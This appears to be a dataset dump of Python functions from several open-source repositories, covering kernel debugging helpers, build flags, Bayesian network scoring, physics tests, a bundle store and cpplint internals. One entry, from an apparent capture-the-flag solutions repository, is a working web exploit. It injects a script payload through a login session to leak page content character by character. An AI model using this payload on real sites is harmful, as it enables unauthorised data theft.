| function (string, 11–56k chars) | repo_name (string, 5–60 chars) | features (sequence) |
---|---|---|
def pfn_to_page(cls, pfn: int) -> gdb.Value:
    if cls.sparsemem:
        section_nr = pfn >> (cls.SECTION_SIZE_BITS - cls.PAGE_SHIFT)
        root_idx = section_nr // cls.SECTIONS_PER_ROOT
        offset = section_nr & (cls.SECTIONS_PER_ROOT - 1)
        section = symvals.mem_section[root_idx][offset]
        pagemap = section["section_mem_map"] & ~3
        return (pagemap.cast(types.page_type.pointer()) + pfn).dereference()
    # pylint doesn't have the visibility it needs to evaluate this
    # pylint: disable=unsubscriptable-object
    return cls.vmemmap[pfn]
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
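The sparsemem branch above is pure bit arithmetic, so it can be sanity-checked on plain integers. A minimal sketch, assuming typical x86-64 constants (SECTION_SIZE_BITS = 27, PAGE_SHIFT = 12, SECTIONS_PER_ROOT = 256); the real class reads these from the kernel being debugged:

```python
# Hypothetical constants for illustration (typical x86-64 values); the
# real code pulls these from the debugged kernel's symbols.
SECTION_SIZE_BITS = 27   # 128 MiB memory sections
PAGE_SHIFT = 12          # 4 KiB pages
SECTIONS_PER_ROOT = 256

def locate_section(pfn: int):
    """Return (root index, offset) of the mem_section entry covering pfn."""
    section_nr = pfn >> (SECTION_SIZE_BITS - PAGE_SHIFT)
    root_idx = section_nr // SECTIONS_PER_ROOT
    offset = section_nr & (SECTIONS_PER_ROOT - 1)
    return root_idx, offset

# A pfn at physical address 5 GiB lands in section 40: root 0, offset 40.
print(locate_section((5 << 30) >> PAGE_SHIFT))  # -> (0, 40)
```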
def setup_pageflags(cls, gdbtype: gdb.Type) -> None:
    for field in gdbtype.fields():
        cls.pageflags[field.name] = field.enumval
    cls.setup_pageflags_done = True
    if cls.setup_page_type_done and not cls.setup_pageflags_finish_done:
        cls.setup_pageflags_finish()
    cls.PG_slab = 1 << cls.pageflags['PG_slab']
    cls.PG_lru = 1 << cls.pageflags['PG_lru']
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def setup_vmemmap_base(cls, symbol: gdb.Symbol) -> None:
    cls.vmemmap_base = int(symbol.value())
    # setup_page_type() ran first and used the hardcoded initial value,
    # so we have to update the cached vmemmap pointer here.
    cls.vmemmap = gdb.Value(cls.vmemmap_base).cast(types.page_type.pointer())
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def setup_directmap_base(cls, symbol: gdb.Symbol) -> None:
    cls.directmap_base = int(symbol.value())
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def setup_zone_type(cls, gdbtype: gdb.Type) -> None:
    max_nr_zones = gdbtype['__MAX_NR_ZONES'].enumval
    cls.ZONES_WIDTH = int(ceil(log(max_nr_zones, 2)))
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def setup_nodes_width(cls, symbol: Union[gdb.Symbol, gdb.MinSymbol]) -> None:
    """
    Detect NODES_WIDTH from the in-kernel config table.

    Args:
        symbol: The ``kernel_config_data`` symbol or minimal symbol.
            It is not used directly; it is only used to determine whether
            the config data should be available.
    """
    # TODO: handle kernels with no space for nodes in page flags
    try:
        cls.NODES_WIDTH = int(config['NODES_SHIFT'])
    except (KeyError, DelayedAttributeError):
        # XXX
        print("Unable to determine NODES_SHIFT from config, trying 8")
        cls.NODES_WIDTH = 8
    # piggyback on this callback because the type callback doesn't seem
    # to work for unsigned long
    cls.BITS_PER_LONG = types.unsigned_long_type.sizeof * 8
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def setup_pageflags_finish(cls) -> None:
    cls.setup_pageflags_finish_done = True
    cls._is_tail = cls.__is_tail_compound_head_bit
    cls._compound_head = cls.__compound_head_uses_low_bit
    if 'PG_tail' in cls.pageflags.keys():
        cls.PG_tail = 1 << cls.pageflags['PG_tail']
        cls._is_tail = cls.__is_tail_flag
    if cls.compound_head_name == 'first_page':
        cls._compound_head = cls.__compound_head_first_page
        if cls.PG_tail == -1:
            cls.PG_tail = (1 << cls.pageflags['PG_compound']) | (1 << cls.pageflags['PG_reclaim'])
            cls._is_tail = cls.__is_tail_flagcombo
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def from_obj(cls, page: gdb.Value) -> 'Page':
    pfn = (int(page.address) - Page.vmemmap_base) // types.page_type.sizeof
    return Page(page, pfn)
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def from_page_addr(cls, addr: int) -> 'Page':
    page_ptr = gdb.Value(addr).cast(types.page_type.pointer())
    return cls.from_obj(page_ptr.dereference())
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def __is_tail_flagcombo(self) -> bool:
    return bool((self.flags & self.PG_tail) == self.PG_tail)
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def __is_tail_compound_head_bit(self) -> bool:
    return bool(self.gdb_obj['compound_head'] & 1)
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def is_slab(self) -> bool:
    return bool(self.flags & self.PG_slab)
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def is_anon(self) -> bool:
    mapping = int(self.gdb_obj["mapping"])
    return (mapping & PAGE_MAPPING_ANON) != 0
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def get_slab_page(self) -> gdb.Value:
    if Page.slab_page_name == "lru":
        return self.gdb_obj["lru"]["prev"]
    return self.gdb_obj[Page.slab_page_name]
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def get_zid(self) -> int:
    shift = self.BITS_PER_LONG - self.NODES_WIDTH - self.ZONES_WIDTH
    zid = (self.flags >> shift) & ((1 << self.ZONES_WIDTH) - 1)
    return zid
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
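The zone id lives in the top bits of page->flags, just below the node bits. A standalone sketch of the same extraction, with hypothetical widths chosen only for the example:

```python
# Hypothetical 64-bit layout: [node: 8 bits][zone: 2 bits][...other flags]
BITS_PER_LONG = 64
NODES_WIDTH = 8
ZONES_WIDTH = 2

def get_zid(flags: int) -> int:
    shift = BITS_PER_LONG - NODES_WIDTH - ZONES_WIDTH
    return (flags >> shift) & ((1 << ZONES_WIDTH) - 1)

# Pack node 3 and zone 2 into the top of a flags word, then read the zone back.
flags = (3 << 56) | (2 << 54) | 0x1
print(get_zid(flags))  # -> 2
```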
def __compound_head_uses_low_bit(self) -> int:
    return int(self.gdb_obj['compound_head']) - 1
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def compound_head(self) -> 'Page':
    if not self.is_tail():
        return self
    return self.__class__.from_page_addr(self.__compound_head())
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def page_addr(struct_page_addr: int) -> int:
    pfn = (struct_page_addr - Page.vmemmap_base) // types.page_type.sizeof
    return Page.directmap_base + (pfn * Page.PAGE_SIZE)
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def page_from_addr(addr: int) -> 'Page':
    pfn = (addr - Page.directmap_base) // Page.PAGE_SIZE
    return pfn_to_page(pfn)
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def page_from_gdb_obj(gdb_obj: gdb.Value) -> 'Page':
    pfn = (int(gdb_obj.address) - Page.vmemmap_base) // types.page_type.sizeof
    return Page(gdb_obj, pfn)
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def for_each_page() -> Iterable[Page]:
    # TODO: works only on x86?
    max_pfn = int(symvals.max_pfn)
    for pfn in range(max_pfn):
        try:
            yield pfn_to_page(pfn)
        except gdb.error:
            # TODO: distinguish pfn_valid() and report failures for those?
            pass
| jeffmahoney/crash-python | [61, 23, 61, 13, 1455127548] |
def allCompilerOptions (platformOptions):
  result = platformOptions
  result.append ("-Wall")
  result.append ("-Werror")
  result.append ("-Wreturn-type")
  result.append ("-Wformat")
  result.append ("-Wsign-compare")
  result.append ("-Wpointer-arith")
  return result
| TrampolineRTOS/trampoline | [480, 230, 480, 24, 1441963168] |
def compilerReleaseOptions (platformOptions):
  result = platformOptions
  result.append ("-DDO_NOT_GENERATE_CHECKINGS")
  result.append ("-Wunused-variable")
  return result
| TrampolineRTOS/trampoline | [480, 230, 480, 24, 1441963168] |
def compilerDebugOptions (platformOptions):
  result = platformOptions
  result.append ("-g")
  return result
| TrampolineRTOS/trampoline | [480, 230, 480, 24, 1441963168] |
def C_CompilerOptions (platformOptions):
  result = platformOptions
  result.append ("-std=c99")
  return result
| TrampolineRTOS/trampoline | [480, 230, 480, 24, 1441963168] |
def Cpp_CompilerOptions (platformOptions):
  result = platformOptions
  result.append ("-std=c++14")
  result.append ("-Woverloaded-virtual")
  return result
| TrampolineRTOS/trampoline | [480, 230, 480, 24, 1441963168] |
def ObjectiveC_CompilerOptions (platformOptions):
  result = platformOptions
  return result
| TrampolineRTOS/trampoline | [480, 230, 480, 24, 1441963168] |
def ObjectiveCpp_CompilerOptions (platformOptions):
  result = platformOptions
  return result
| TrampolineRTOS/trampoline | [480, 230, 480, 24, 1441963168] |
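These helpers all share one pattern: `result` aliases the `platformOptions` list, so each call mutates the caller's list in place as well as returning it. A small usage sketch; the call chain below is an assumption for illustration, not necessarily how the build script composes them:

```python
platform_options = ["-mcpu=cortex-m4"]  # hypothetical platform flags

options = allCompilerOptions(platform_options)  # warnings for every build
options = compilerDebugOptions(options)         # adds -g
options = C_CompilerOptions(options)            # adds -std=c99

print(options)
# ['-mcpu=cortex-m4', '-Wall', '-Werror', '-Wreturn-type', '-Wformat',
#  '-Wsign-compare', '-Wpointer-arith', '-g', '-std=c99']
# Note: platform_options now refers to this same list. Copying the input
# (result = list(platformOptions)) would leave the caller's list untouched.
```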
def trigger(c, idx):
    import string
    sess = requests.Session()
    # init session
    sess.post(URL + '/?action=login', data={'realname': 'new_session'})
    # manipulate session
    p = '''<script>f=function(n){eval('X5O!P%@AP[4\\\\PZX54(P^)7CC)7}$$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$$H+H'+{${c}:'*'}[Math.min(${c},n)])};f(document.body.innerHTML[${idx}].charCodeAt(0));</script><body>'''
    p = string.Template(p).substitute({'idx': idx, 'c': c})
    resp = sess.post(URL + '/?action=login', data={'realname': '"http://127.0.0.1/flag?a=' + p, 'nickname': '</body>'})
    return "<h1>Welcome" not in resp.text
| Qwaz/solved-hacking-problem | [78, 22, 78, 1, 1452176298] |
def log(x):
    return math.log(x, 2)
| sysbio-vo/bnfinder | [47, 7, 47, 1, 1422015925] |
def __init__(self, prior=None, *args, **kwds):
    score.__init__(self, *args, **kwds)
    self.prior = prior
| sysbio-vo/bnfinder | [47, 7, 47, 1, 1422015925] |
def HP(self, v, par):
    if self.prior is None:
        return max(2, v.n_disc)
    else:
        hp = float(self.prior)
        for p in par:
            hp /= max(2, p.n_disc)
        return hp
| sysbio-vo/bnfinder | [47, 7, 47, 1, 1422015925] |
def H(self, v, par):
    if self.prior is None:
        return 1.0
    else:
        return self.HP(v, par) / max(2, v.n_disc)
| sysbio-vo/bnfinder | [47, 7, 47, 1, 1422015925] |
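HP spreads the user-supplied prior pseudocount over the parent state space, and H is that amount per child state. A worked example with stub objects; the attribute names follow the snippet, the numbers are made up:

```python
from types import SimpleNamespace

# Stub vertices: n_disc is the number of discrete states, as in the snippet.
child = SimpleNamespace(n_disc=3)
parents = [SimpleNamespace(n_disc=2), SimpleNamespace(n_disc=4)]

prior = 8.0
# HP: divide the prior by each parent's state count -> 8 / 2 / 4 = 1.0
hp = prior
for p in parents:
    hp /= max(2, p.n_disc)
print(hp)                           # -> 1.0
# H: pseudocount per child state -> HP / max(2, n_disc) = 1.0 / 3
print(hp / max(2, child.n_disc))    # -> 0.3333...
```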
def graph_score(self, number_of_potential_parents, gene_vertex, weights_of_parents, number_of_data_points):
    return sum(map(log, weights_of_parents)) * log(number_of_data_points + 1) * min(1, gene_vertex.n_disc + 0.1)
| sysbio-vo/bnfinder | [47, 7, 47, 1, 1422015925] |
def lower_bound_for_data_score(self, selected_data_empty):
    if self.prior is not None:
        return 0.0
    HP = self.HP(selected_data_empty.vertex, [])
    H = self.H(selected_data_empty.vertex, [])
    stats_all, stats_par = selected_data_empty.stats()
    if selected_data_empty.vertex.n_disc:
        s = 0
        for a, cv in stats_all.items():
            for i in range(0, cv):
                s -= log(H + i)
                s += log(HP + i)
        return s
    else:
        return 0.0
| sysbio-vo/bnfinder | [47, 7, 47, 1, 1422015925] |
def test_num_swaps_to_sort(array, expected_num_swaps):
    assert num_swaps_to_sort(array) == expected_num_swaps
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
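The implementation under test is not included in this dump. A minimal sketch of what a num_swaps_to_sort could look like, counting swaps via cycle decomposition of the sorting permutation; this is an assumption for illustration, not PyLATO's actual code:

```python
def num_swaps_to_sort(array):
    """Minimum number of swaps needed to sort `array`.

    Each cycle of length k in the sorting permutation costs k - 1 swaps.
    """
    order = sorted(range(len(array)), key=lambda i: array[i])
    seen = [False] * len(array)
    swaps = 0
    for start in range(len(array)):
        if seen[start]:
            continue
        # Walk one permutation cycle.
        length = 0
        i = start
        while not seen[i]:
            seen[i] = True
            i = order[i]
            length += 1
        swaps += length - 1
    return swaps

assert num_swaps_to_sort([2, 1]) == 1
assert num_swaps_to_sort([3, 1, 2]) == 2
```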
def test_init_input_density_matrix(self):
    # Setup
    Job = InitJob("test_data/JobDef_input_density_matrix.json")
    input_rho_file = Job.Def['input_rho']
    with open(input_rho_file, 'r') as file_handle:
        input_rho = np.matrix(json.load(file_handle))
    # Action
    electronic = Electronic(Job)
    # Result
    assert np.array_equal(electronic.rho, input_rho)
    assert np.array_equal(electronic.rhotot, input_rho)
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
def test_quantum_number_S_is_None(self):
    # Setup
    Job = InitJob("test_data/JobDef_scase.json")
    # Fake
    def fake_magnetic_correlation(*args):
        return -1
    Job.Electron.magnetic_correlation = fake_magnetic_correlation
    # Action
    S = Job.Electron.quantum_number_S(Job)
    # Result
    assert S is None
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
def test_quantum_number_S(self, name, rho, expected_S):
    # Setup
    Job = InitJob("test_data/JobDef_scase.json")
    # Spin 0 density matrix
    Job.Electron.rho = np.matrix(rho)
    # Action
    S = Job.Electron.quantum_number_S(Job)
    # Result
    assert S == expected_S
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
def fake_L_z_p_orb(*args):
    return -1
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
def test_quantum_number_L_z_d_orb_is_None(self):
    # Setup
    Job = InitJob("test_data/JobDef_pcase.json")
    # Fake
    def fake_L_z_d_orb(*args):
        return -1
    Job.Electron.L_z_d_orb = fake_L_z_d_orb
    # Action
    L_z = Job.Electron.quantum_number_L_z_d_orb(Job)
    # Result
    assert L_z is None
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
def test_quantum_number_L_z(self, name, rho, expected_L_z):
    # Setup
    Job = InitJob("test_data/JobDef_pcase.json")
    # Fake
    Job.NAtom = 1
    Job.NOrb = [len(rho)/2]
    Job.Electron.NElectrons = sum(rho[ii][ii] for ii in range(len(rho)))
    Job.Electron.rho = np.matrix(rho, dtype='complex')
    # Action
    L_z = Job.Electron.quantum_number_L_z(Job)
    # Result
    assert L_z == expected_L_z
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
def test_quantum_number_L_z_dimers(self, job_file, rho_file, expected_L_z):
    # Setup
    Job = InitJob(job_file)
    # Fake
    rho = load_json_file(rho_file)
    Job.Electron.rho = np.matrix(rho, dtype='complex')
    # Action
    L_z = Job.Electron.quantum_number_L_z(Job)
    # Result
    assert L_z == expected_L_z
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
def test_quantum_number_L_z_1_electron(self):
    # Setup
    Job = InitJob("test_data/JobDef_scase.json")
    Job.Electron.NElectrons = 1
    # Action
    L_z = Job.Electron.quantum_number_L_z(Job)
    # Result
    assert L_z == 0
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
def test_all_atoms_same_num_orbitals(self, norb, expected_result):
    # Setup
    Job = InitJob("test_data/JobDef_scase.json")
    # Fake
    Job.NOrb = norb
    # Action
    result = Job.Electron.all_atoms_same_num_orbitals(Job)
    # Result
    assert result is expected_result
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
def test_perform_inversion(self, job_file, old_eigenvectors,
                           expected_eigenvectors):
    # Setup
    Job = InitJob(job_file)
    # Action
    new_eigenvectors = Job.Electron.perform_inversion(Job, old_eigenvectors)
    # Result
    assert all(np.array_equal(new_eigenvectors[i], expected_eigenvectors[i])
               for i in range(len(expected_eigenvectors)))
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
def test_symmetry_operation_result(self, name, new_eigenvectors,
                                   old_eigenvectors, expected_result):
    # Setup
    Job = InitJob("test_data/JobDef_scase.json")
    # Action
    result = Job.Electron.symmetry_operation_result(Job, new_eigenvectors,
                                                    old_eigenvectors)
    # Result
    assert result == expected_result
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
def test_gerade(self, job_file, expected_gerade):
    # Setup
    Job = InitJob(job_file)
    Job = execute_job(Job)
    # Action
    gerade = Job.Electron.gerade(Job)
    # Result
    assert gerade == expected_gerade
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
def test_get_reflected_value(self, job_file, orbital, initial_value,
                             expected_reflected_value):
    # Setup
    Job = InitJob(job_file)
    atom = 0
    # Action
    reflected_value = Job.Electron.get_reflected_value(Job, initial_value,
                                                       atom, orbital)
    # Result
    assert reflected_value == expected_reflected_value
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
def test_perform_reflection(self, job_file, old_eigenvectors,
                            expected_eigenvectors):
    # Setup
    Job = InitJob(job_file)
    # Action
    new_eigenvectors = Job.Electron.perform_reflection(Job, old_eigenvectors)
    # Result
    assert all(np.array_equal(new_eigenvectors[i], expected_eigenvectors[i])
               for i in range(len(expected_eigenvectors)))
| mec07/PyLATO | [3, 2, 3, 7, 1433328488] |
def __init__(self, repo):
    storetype = repo.ui.config("infinitepush", "storetype", "")
    if storetype == "disk":
        self.store = filebundlestore(repo)
    elif storetype == "external":
        self.store = externalbundlestore(repo)
    else:
        raise error.Abort(
            _("unknown infinitepush store type specified %s") % storetype
        )
    indextype = repo.ui.config("infinitepush", "indextype", "")
    if indextype == "disk":
        from . import fileindex
        self.index = fileindex.fileindex(repo)
    elif indextype == "sql":
        # Delayed import of sqlindex to avoid including unnecessary
        # dependencies on mysql.connector.
        from . import sqlindex
        self.index = sqlindex.sqlindex(repo)
    else:
        raise error.Abort(
            _("unknown infinitepush index type specified %s") % indextype
        )
| facebookexperimental/eden | [4737, 192, 4737, 106, 1462467227] |
def __init__(self, repo):
    self.storepath = repo.ui.configpath("scratchbranch", "storepath")
    if not self.storepath:
        self.storepath = repo.localvfs.join("scratchbranches", "filebundlestore")
    if not os.path.exists(self.storepath):
        os.makedirs(self.storepath)
| facebookexperimental/eden | [4737, 192, 4737, 106, 1462467227] |
def _filepath(self, filename):
    return os.path.join(self._dirpath(filename), filename)
| facebookexperimental/eden | [4737, 192, 4737, 106, 1462467227] |
def read(self, key):
    try:
        f = open(self._filepath(key), "rb")
    except IOError:
        return None
    # Close the handle once the contents have been read.
    with f:
        return f.read()
| facebookexperimental/eden | [4737, 192, 4737, 106, 1462467227] |
def __init__(self, repo):
    """
    `put_binary` - path to binary file which uploads bundle to external
        storage and prints key to stdout
    `put_args` - format string with additional args to `put_binary`
        {filename} replacement field can be used.
    `get_binary` - path to binary file which accepts filename and key
        (in that order), downloads bundle from store and saves it to file
    `get_args` - format string with additional args to `get_binary`.
        {filename} and {handle} replacement field can be used.
    """
    ui = repo.ui
    # path to the binary which uploads a bundle to the external store
    # and prints the key to stdout.
    self.put_binary = ui.config("infinitepush", "put_binary")
    if not self.put_binary:
        raise error.Abort("put binary is not specified")
    # Additional args to ``put_binary``. The '{filename}' replacement field
    # can be used to get the filename.
    self.put_args = ui.configlist("infinitepush", "put_args", [])
    # path to the binary which accepts a file and key (in that order) and
    # downloads the bundle from the store and saves it to the file.
    self.get_binary = ui.config("infinitepush", "get_binary")
    if not self.get_binary:
        raise error.Abort("get binary is not specified")
    # Additional args to ``get_binary``. The '{filename}' and '{handle}'
    # replacement fields can be used to get the filename and key.
    self.get_args = ui.configlist("infinitepush", "get_args", [])
| facebookexperimental/eden | [4737, 192, 4737, 106, 1462467227] |
def write(self, data):
    # Won't work on Windows because you can't open a file a second time
    # without closing it first.
    with NamedTemporaryFile() as temp:
        temp.write(data)
        temp.flush()
        temp.seek(0)
        formatted_args = [arg.format(filename=temp.name) for arg in self.put_args]
        returncode, stdout, stderr = self._call_binary(
            [self.put_binary] + formatted_args
        )
        if returncode != 0:
            raise error.Abort(
                "Infinitepush failed to upload bundle to external store: %s"
                % stderr
            )
        stdout_lines = stdout.splitlines()
        if len(stdout_lines) == 1:
            return stdout_lines[0]
        else:
            raise error.Abort(
                "Infinitepush received bad output from %s: %s"
                % (self.put_binary, stdout)
            )
| facebookexperimental/eden | [4737, 192, 4737, 106, 1462467227] |
def ParseNolintSuppressions(filename, raw_line, linenum, error):
  """Updates the global list of error-suppressions.

  Parses any NOLINT comments on the current line, updating the global
  error_suppressions store. Reports an error if the NOLINT comment
  was malformed.

  Args:
    filename: str, the name of the input file.
    raw_line: str, the line of input text, with comments.
    linenum: int, the number of the current line.
    error: function, an error handler.
  """
  matched = Search(r'\bNOLINT(NEXTLINE)?\b(\([^)]+\))?', raw_line)
  if matched:
    if matched.group(1):
      suppressed_line = linenum + 1
    else:
      suppressed_line = linenum
    category = matched.group(2)
    if category in (None, '(*)'):  # => "suppress all"
      _error_suppressions.setdefault(None, set()).add(suppressed_line)
    else:
      if category.startswith('(') and category.endswith(')'):
        category = category[1:-1]
        if category in _ERROR_CATEGORIES:
          _error_suppressions.setdefault(category, set()).add(suppressed_line)
        elif category not in _LEGACY_ERROR_CATEGORIES:
          error(filename, linenum, 'readability/nolint', 5,
                'Unknown NOLINT error category: %s' % category)
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
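The regex above recognizes the three NOLINT spellings. A quick standalone check of just that pattern, using re directly instead of cpplint's Search wrapper:

```python
import re

_NOLINT_RE = re.compile(r'\bNOLINT(NEXTLINE)?\b(\([^)]+\))?')

samples = [
    'int x;  // NOLINT',                           # suppress everything here
    'x++;  // NOLINT(runtime/invalid_increment)',  # suppress one category
    '// NOLINTNEXTLINE(build/include)',            # suppress on the next line
]
for line in samples:
    m = _NOLINT_RE.search(line)
    print(m.group(1), m.group(2))
# -> None None
#    None (runtime/invalid_increment)
#    NEXTLINE (build/include)
```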
def IsErrorSuppressedByNolint(category, linenum):
  """Returns true if the specified error category is suppressed on this line.

  Consults the global error_suppressions map populated by
  ParseNolintSuppressions/ResetNolintSuppressions.

  Args:
    category: str, the category of the error.
    linenum: int, the current line number.
  Returns:
    bool, True iff the error should be suppressed due to a NOLINT comment.
  """
  return (linenum in _error_suppressions.get(category, set()) or
          linenum in _error_suppressions.get(None, set()))
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def ReplaceAll(pattern, rep, s):
  """Replaces instances of pattern in a string with a replacement.

  The compiled regex is kept in a cache shared by Match and Search.

  Args:
    pattern: regex pattern
    rep: replacement text
    s: search string
  Returns:
    string with replacements made (or original string if no replacements)
  """
  if pattern not in _regexp_compile_cache:
    _regexp_compile_cache[pattern] = sre_compile.compile(pattern)
  return _regexp_compile_cache[pattern].sub(rep, s)
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def __init__(self):
  self.include_list = [[]]
  self.ResetSection('')
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def ResetSection(self, directive):
  """Reset section checking for preprocessor directive.

  Args:
    directive: preprocessor directive (e.g. "if", "else").
  """
  # The name of the current section.
  self._section = self._INITIAL_SECTION
  # The path of last found header.
  self._last_header = ''
  # Update list of includes.  Note that we never pop from the
  # include list.
  if directive in ('if', 'ifdef', 'ifndef'):
    self.include_list.append([])
  elif directive in ('else', 'elif'):
    self.include_list[-1] = []
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def CanonicalizeAlphabeticalOrder(self, header_path):
  """Returns a path canonicalized for alphabetical comparison.

  - replaces "-" with "_" so they both cmp the same.
  - removes '-inl' since we don't require them to be after the main header.
  - lowercase everything, just in case.

  Args:
    header_path: Path to be canonicalized.
  Returns:
    Canonicalized path.
  """
  return header_path.replace('-inl.h', '.h').replace('-', '_').lower()
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def CheckNextIncludeOrder(self, header_type):
  """Returns a non-empty error message if the next header is out of order.

  This function also updates the internal state to be ready to check
  the next include.

  Args:
    header_type: One of the _XXX_HEADER constants defined above.
  Returns:
    The empty string if the header is in the right order, or an
    error message describing what's wrong.
  """
  error_message = ('Found %s after %s' %
                   (self._TYPE_NAMES[header_type],
                    self._SECTION_NAMES[self._section]))

  last_section = self._section

  if header_type == _C_SYS_HEADER:
    if self._section <= self._C_SECTION:
      self._section = self._C_SECTION
    else:
      self._last_header = ''
      return error_message
  elif header_type == _CPP_SYS_HEADER:
    if self._section <= self._CPP_SECTION:
      self._section = self._CPP_SECTION
    else:
      self._last_header = ''
      return error_message
  elif header_type == _LIKELY_MY_HEADER:
    if self._section <= self._MY_H_SECTION:
      self._section = self._MY_H_SECTION
    else:
      self._section = self._OTHER_H_SECTION
  elif header_type == _POSSIBLE_MY_HEADER:
    if self._section <= self._MY_H_SECTION:
      self._section = self._MY_H_SECTION
    else:
      # This will always be the fallback because we're not sure
      # enough that the header is associated with this file.
      self._section = self._OTHER_H_SECTION
  else:
    assert header_type == _OTHER_HEADER
    self._section = self._OTHER_H_SECTION

  if last_section != self._section:
    self._last_header = ''

  return ''
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def __init__(self):
  self.verbose_level = 1  # global setting.
  self.error_count = 0    # global count of reported errors
  # filters to apply when emitting error messages
  self.filters = _DEFAULT_FILTERS[:]
  # backup of filter list. Used to restore the state after each file.
  self._filters_backup = self.filters[:]
  self.counting = 'total'  # In what way are we counting errors?
  self.errors_by_category = {}  # string to int dict storing error counts

  # output format:
  # "emacs" - format that emacs can parse (default)
  # "vs7"   - format that Microsoft Visual Studio 7 can parse
  self.output_format = 'emacs'
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def SetVerboseLevel(self, level):
  """Sets the module's verbosity, and returns the previous setting."""
  last_verbose_level = self.verbose_level
  self.verbose_level = level
  return last_verbose_level
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def SetFilters(self, filters):
  """Sets the error-message filters.

  These filters are applied when deciding whether to emit a given
  error message.

  Args:
    filters: A string of comma-separated filters (eg "+whitespace/indent").
             Each filter should start with + or -; else we die.

  Raises:
    ValueError: The comma-separated filters did not all start with '+' or '-'.
                E.g. "-,+whitespace,-whitespace/indent,whitespace/badfilter"
  """
  # Default filters always have less priority than the flag ones.
  self.filters = _DEFAULT_FILTERS[:]
  self.AddFilters(filters)
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
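Filters are evaluated left to right in _ShouldPrintError (shown further down): a matching '-' entry suppresses a category prefix, and a later matching '+' entry re-enables it. A standalone sketch of that evaluation order, independent of cpplint's global state:

```python
def is_filtered(category, filters):
    """Last matching +/- prefix wins, mirroring _ShouldPrintError below."""
    filtered = False
    for one_filter in filters:
        if one_filter.startswith('-') and category.startswith(one_filter[1:]):
            filtered = True
        elif one_filter.startswith('+') and category.startswith(one_filter[1:]):
            filtered = False
    return filtered

filters = ['-whitespace', '+whitespace/indent']
print(is_filtered('whitespace/indent', filters))  # -> False (re-enabled)
print(is_filtered('whitespace/braces', filters))  # -> True  (suppressed)
print(is_filtered('runtime/int', filters))        # -> False (never matched)
```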
def BackupFilters(self):
  """Saves the current filter list to backup storage."""
  self._filters_backup = self.filters[:]
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def ResetErrorCounts(self):
  """Sets the module's error statistic back to zero."""
  self.error_count = 0
  self.errors_by_category = {}
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def PrintErrorCounts(self):
  """Print a summary of errors by category, and the total."""
  for category, count in self.errors_by_category.iteritems():
    sys.stderr.write('Category \'%s\' errors found: %d\n' %
                     (category, count))
  sys.stderr.write('Total errors found: %d\n' % self.error_count)
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def _OutputFormat():
  """Gets the module's output format."""
  return _cpplint_state.output_format
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def _VerboseLevel():
  """Returns the module's verbosity setting."""
  return _cpplint_state.verbose_level
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def _SetCountingStyle(level):
  """Sets the module's counting options."""
  _cpplint_state.SetCountingStyle(level)
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def _SetFilters(filters):
  """Sets the module's error-message filters.

  These filters are applied when deciding whether to emit a given
  error message.

  Args:
    filters: A string of comma-separated filters (eg "whitespace/indent").
             Each filter should start with + or -; else we die.
  """
  _cpplint_state.SetFilters(filters)
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def _BackupFilters():
  """Saves the current filter list to backup storage."""
  _cpplint_state.BackupFilters()
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def __init__(self):
  self.in_a_function = False
  self.lines_in_function = 0
  self.current_function = ''
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def Count(self):
  """Count line in current function body."""
  if self.in_a_function:
    self.lines_in_function += 1
| 24OI/CodeStack | [15, 6, 15, 4, 1445156661] |
def End(self):
  """Stop analyzing function body."""
